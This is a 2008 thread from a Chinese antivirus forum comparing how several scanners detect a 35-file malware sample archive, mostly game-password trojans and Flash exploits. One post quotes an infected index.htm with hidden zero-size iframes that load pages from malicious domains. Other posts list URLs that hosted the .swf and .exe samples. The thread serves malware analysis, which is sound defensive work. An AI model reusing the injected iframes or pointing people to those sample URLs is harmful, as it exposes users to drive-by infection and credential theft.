收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 卡饭贴子的病毒网站 avast!还不可防御他的
123下一页
返回列表 发新帖
楼主: aaad2008
 收起左侧

[病毒样本] 卡饭贴子的病毒网站 avast!还不可防御他的

[复制链接]
小邪邪
发表于 2008-6-6 18:56:19 | 显示全部楼层
最近毒网真多,这个网一进去又是两个毒跑进临时文件夹里了

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

sbbdms
发表于 2008-6-6 18:59:42 | 显示全部楼层
原帖由 tanlimo 于 2008-6-6 18:52 发表


难以置信


是之前我发的那个index.htm文件!!别弄错了
回复

举报

woai_jolin
发表于 2008-6-6 19:00:42 | 显示全部楼层
正在扫描日志
病毒库版本: 3163 (20080606)
日期: 2008-6-6  时间: 19:01:31
已扫描的磁盘、文件夹和文件: G:\v\样本(35个).rar
G:\v\样本(35个).rar > RAR > 9.exe - 可能是 Win32/PSW.OnLineGames.NML 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 10.exe - Win32/PSW.OnLineGames.MUG 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 11.exe - Win32/PSW.QQPass.NCZ 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 12.exe - Win32/PSW.OnLineGames.XZN 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 13.exe - Win32/PSW.OnLineGames.XZN 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 14.exe - 可能是 Win32/PSW.OnLineGames.NML 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 15.exe - Win32/PSW.OnLineGames.XZN 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 16.exe - 可能是 Win32/PSW.OnLineGames.NWC 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 17.exe - Win32/PSW.OnLineGames.XZN 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 18.exe - 可能是 Win32/PSW.OnLineGames.NML 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 19.exe - 可能是 Win32/PSW.OnLineGames.NML 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 20.exe - Win32/PSW.OnLineGames.XZN 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 21.exe - 可能是 Win32/PSW.OnLineGames.NWC 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 22.exe - 可能是 Win32/PSW.OnLineGames.NWB 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 23.exe - 可能是 Win32/PSW.OnLineGames.NML 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 24.exe - Win32/PSW.OnLineGames.XZN 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 25.exe - Win32/PSW.OnLineGames.NWC 特洛伊木马 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 28.exe - Win32/PSW.OnLineGames.NWC 特洛伊木马 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 29.exe - Win32/PSW.OnLineGames.XZN 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 26.exe - 未查明的 NewHeur_PE 病毒 [7] - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > control_pic.jpg - 正常
G:\v\样本(35个).rar > RAR > 4561.swf - 正常
G:\v\样本(35个).rar > RAR > 4562.swf - 正常
G:\v\样本(35个).rar > RAR > i115.swf - SWF/Exploit.CVE-2007-0071 特洛伊木马 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > WIN 9,0,115,0i.swf - SWF/Exploit.CVE-2007-0071 特洛伊木马 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > cs.exe - Win32/TrojanDownloader.Small.OCT 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > svcos.exe - Win32/TrojanDownloader.Small.OCT 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 2.exe - Win32/PSW.OnLineGames.NWB 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 1.exe - 可能是 Win32/PSW.OnLineGames.NWB 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 3.exe - 可能是 Win32/PSW.OnLineGames.NML 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 4.exe - Win32/PSW.OnLineGames.NWB 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 5.exe - Win32/PSW.OnLineGames.MUG 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 6.exe - Win32/PSW.OnLineGames.NWC 特洛伊木马 的变种 - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 7.exe - 未查明的 NewHeur_PE 病毒 [7] - 是已删除对象的一部分
G:\v\样本(35个).rar > RAR > 8.exe > UPX v12_m2 - 正常
已扫描的对象数: 35
发现的威胁数: 31
已清除对象数:31
完成时间: 19:01:35  总扫描时间: 4 秒 (00:00:04)

备注:
[7] 对象可能感染了未知病毒。
回复

举报

tanlimo
发表于 2008-6-6 19:02:29 | 显示全部楼层

回复 13楼 sbbdms 的帖子

问题就在于index.htm本身就有很大的问题。


  2. <iframe src=http://www.youkum.cn/css.htm width=0 height=0></iframe>
  3. <iframe src=http://www.91zc.com/head.asp width=0 height=0></iframe>
  4. <iframe src=http://www.xh128.cn/head.htm width=0 height=0></iframe>
  5. <title>访问地址错误!!!</title>
  6. <span style="display:none"><script language="javascript" type="text/javascript" src="http://js.users.51.la/612367.js"></script></span>
  7. <script type="text/javascript"><!--

复制代码

[ 本帖最后由 tanlimo 于 2008-6-6 19:09 编辑 ]
回复

举报

sbbdms
发表于 2008-6-6 19:02:50 | 显示全部楼层
原帖由 tanlimo 于 2008-6-6 18:21 发表
http://www.live322.cn/4561.swf
http://www.live322.cn/4562.swf
http://beichuanzouhao.cn/flash/i115.swf
http://www.psp666.cn/WIN%209,0,115,0i.swf
http://512beichuan.cn/flash/cs.exe
http://fanduizd. ...


卡巴杀32,miss three
TO KL
回复

举报

chenyilong58
发表于 2008-6-6 19:06:53 | 显示全部楼层
35本本KIS8  32个,高启发
回复

举报

allinwonderi
发表于 2008-6-6 20:18:57 | 显示全部楼层

ArcaVir2008

[Scanning : C:\Documents and Settings\All Users\Documents\Test]


C:\Documents and Settings\All Users\Documents\Test\样本(35个).rar<RAR>:12.exe<UPack>:12.exe<DLLRES>:res0.exe <- Trojan.Psw.Onlinegames.Amax : No action
C:\Documents and Settings\All Users\Documents\Test\样本(35个).rar<RAR>:13.exe<UPack>:13.exe<DLLRES>:res0.exe <- Trojan.Psw.Onlinegames.Amax : No action
C:\Documents and Settings\All Users\Documents\Test\样本(35个).rar<RAR>:15.exe <- Trojan.Psw.Onlinegames.Ambs : No action
C:\Documents and Settings\All Users\Documents\Test\样本(35个).rar<RAR>:15.exe<UPack>:15.exe<DLLRES>:res0.exe <- Trojan.Psw.Onlinegames.Amax : No action
C:\Documents and Settings\All Users\Documents\Test\样本(35个).rar<RAR>:20.exe<UPack>:20.exe<DLLRES>:res0.exe <- Trojan.Psw.Onlinegames.Amax : No action
C:\Documents and Settings\All Users\Documents\Test\样本(35个).rar<RAR>:21.exe <- Trojan.Psw.Onlinegames.Alll : No action
C:\Documents and Settings\All Users\Documents\Test\样本(35个).rar<RAR>:22.exe <- Trojan.Psw.Onlinegames.Ahsh : No action
C:\Documents and Settings\All Users\Documents\Test\样本(35个).rar<RAR>:24.exe<UPack>:24.exe<DLLRES>:res0.exe <- Trojan.Psw.Onlinegames.Amax : No action
C:\Documents and Settings\All Users\Documents\Test\样本(35个).rar<RAR>:25.exe <- Trojan.Psw.Onlinegames.Ajsv : No action
C:\Documents and Settings\All Users\Documents\Test\样本(35个).rar<RAR>:26.exe<FSG>:26.exe<DLLRES>:res0.exe<DLLRES>:res1.exe<FSG>:res1.exe <- Downloader.Vb.ehf : No action
C:\Documents and Settings\All Users\Documents\Test\样本(35个).rar<RAR>:26.exe<FSG>:26.exe<DLLRES>:res1.exe <- Trojan.Downloader.Vb.Egk : No action
C:\Documents and Settings\All Users\Documents\Test\样本(35个).rar<RAR>:cs.exe<UPack>:cs.exe<DLLRES>:res1.exe <- Trojan.Small.Duk : No action
C:\Documents and Settings\All Users\Documents\Test\样本(35个).rar<RAR>:svcos.exe<UPack>:svcos.exe<DLLRES>:res1.exe <- Trojan.Small.Duk : No action
C:\Documents and Settings\All Users\Documents\Test\样本(35个).rar<RAR>:2.exe<UPX>:2.exe<DLLRES>:res1.exe <- Trojan.Psw.Onlinegames.Amol : No action
C:\Documents and Settings\All Users\Documents\Test\样本(35个).rar<RAR>:1.exe <- Trojan.Psw.Onlinegames.Alcm : No action
C:\Documents and Settings\All Users\Documents\Test\样本(35个).rar<RAR>:1.exe<UPX>:1.exe<DLLRES>:res0.exe <- Trojan.Psw.Onlinegames.Alyc : No action
C:\Documents and Settings\All Users\Documents\Test\样本(35个).rar<RAR>:1.exe<UPX>:1.exe<DLLRES>:res1.exe <- Trojan.Psw.Onlinegames.Amol : No action
C:\Documents and Settings\All Users\Documents\Test\样本(35个).rar<RAR>:5.exe <- Trojan.Psw.Onlinegames.Ajau : No action
C:\Documents and Settings\All Users\Documents\Test\样本(35个).rar<RAR>:5.exe<UPX>:5.exe<DLLRES>:res0.exe <- Trojan.Psw.Wow.Baa : No action
C:\Documents and Settings\All Users\Documents\Test\样本(35个).rar<RAR>:5.exe<UPX>:5.exe<DLLRES>:res0.exe<DLLRES>:res0.exe <- Trojan.Psw.Onlinegames.Ajep : No action
C:\Documents and Settings\All Users\Documents\Test\样本(35个).rar<RAR>:6.exe <- Trojan.Psw.Onlinegames.Aldr : No action
C:\Documents and Settings\All Users\Documents\Test\样本(35个).rar<RAR>:8.exe <- Trojan.Psw.Onlinegames.Amdy : No action



Scanned objects : 104

Infected objects : 22
回复

举报

allinwonderi
发表于 2008-6-6 20:19:37 | 显示全部楼层

F-Prot 4.4.4

Scan ended:        2008-6-6, 20:19:24
Duration:        0:00:20

Scan result:

Scanned files:                 6
Infected objects:         23
Disinfected objects:         0
Quarantined files:         0
---------------------------------------------------------------------
回复

举报

qigang
发表于 2008-6-6 20:36:18 | 显示全部楼层
瑞星病毒查杀结果报告

清除病毒种类列表:

病毒: Trojan.PSW.Win32.GameOL.nyb

MAC 地址:00:11:5B:F3:6D:69

用户来源:互联网

软件版本:20.47.42

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

qigang
发表于 2008-6-6 20:38:07 | 显示全部楼层

80/35

原帖由 tanlimo 于 2008-6-6 18:21 发表
http://www.live322.cn/4561.swf
http://www.live322.cn/4562.swf
http://beichuanzouhao.cn/flash/i115.swf
http://www.psp666.cn/WIN%209,0,115,0i.swf
http://512beichuan.cn/flash/cs.exe
http://fanduizd. ...



瑞星病毒查杀结果报告

清除病毒种类列表:

病毒: Trojan.PSW.Win32.GameOL.nxy
病毒: Trojan.PSW.Win32.GameOL.nuf
病毒: Trojan.PSW.Win32.GamesOnline.afp
病毒: Trojan.PSW.Win32.GameOL.nvb
病毒: Trojan.PSW.Win32.XYOnline.afb
病毒: Trojan.PSW.Win32.GameOL.nvc
病毒: Trojan.PSW.Win32.GameOL.nxi
病毒: Trojan.PSW.Win32.GameOL.nsu
病毒: Trojan.Win32.Undef.hir   
病毒: RootKit.Win32.Undef.ht   
病毒: Trojan.DL.Win32.Mnless.acp
病毒: RootKit.Win32.Mnless.si  
病毒: RootKit.Win32.Mnless.si  
病毒: Trojan.PSW.Win32.QQHX.txx
病毒: Trojan.PSW.Win32.GameOL.nvd
病毒: RootKit.Win32.Mnless.qa  
病毒: Trojan.Win32.Undef.gpq   
病毒: Trojan.PSW.Win32.GameOL.nxx
病毒: Trojan.PSW.Win32.LMir.bqe
病毒: Trojan.PSW.Win32.LMir.bqe

MAC 地址:00:11:5B:F3:6D:69

用户来源:互联网

软件版本:20.47.42
回复

举报

下一页 »
123下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-5-6 22:10 , Processed in 0.100722 second(s), 15 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表